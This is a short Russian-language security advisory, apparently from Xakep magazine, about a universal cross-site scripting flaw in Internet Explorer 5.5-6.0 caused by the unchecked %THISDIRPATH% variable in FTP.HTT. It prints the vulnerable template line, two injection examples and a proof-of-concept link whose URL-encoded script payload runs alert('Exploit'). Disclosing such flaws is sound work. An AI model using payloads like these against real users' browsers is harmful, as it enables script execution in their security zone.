Xakep #305. Многошаговые SQL-инъекции
В Microsoft Internet Explorer обнаружена возможность универсального межсайтового скриптинга. Данные, включенные в FTP URL, могут интерпретироваться как содержание,
что позволяет выполнять произвольный JavaScript
код с настройками безопасности для зоны Local Computer.
Уязвимость возникает при включенном режиме "Folder View for FTP sites" и опции 'Enable Web content in folders' в
Эксплорере.
Проблема находится в файле FTP.HTT, отвечающем
за функцию 'Folder view for FTP sites' (%SystemRoot%\WEB\FTP.HTT). В строке:
---------FTP.HTT--------------------
35: <BASE href="https://xakep.ru/wp-content/uploads/post/15488/%THISDIRPATH%\">
---------------------------------------
Переменная THISDIRPATH не проверяется перед обработкой.
Пример1:
[ ftp://TARGET ]
'%THISDIRPATH%' = 'ftp://TARGET/'
<BASE href="ftp://TARGET/\">
Пример 2:
[ ftp://"><script>alert("Exploit");</script> ]
'%THISDIRPATH%' = 'ftp://"><script>alert("Exploit");</script>/'
<BASE href="ftp://"><script>alert("Exploit");</script>/\">
Эксплоит:
<a href="ftp://%22%3e%3cscript%3ealert(%22Exploit%22)%3b%3c%2fscript%3e%20" target="_blank">Exploit</a>
Уязвимость обнаружена в Microsoft Internet Explorer 5.5-6.0.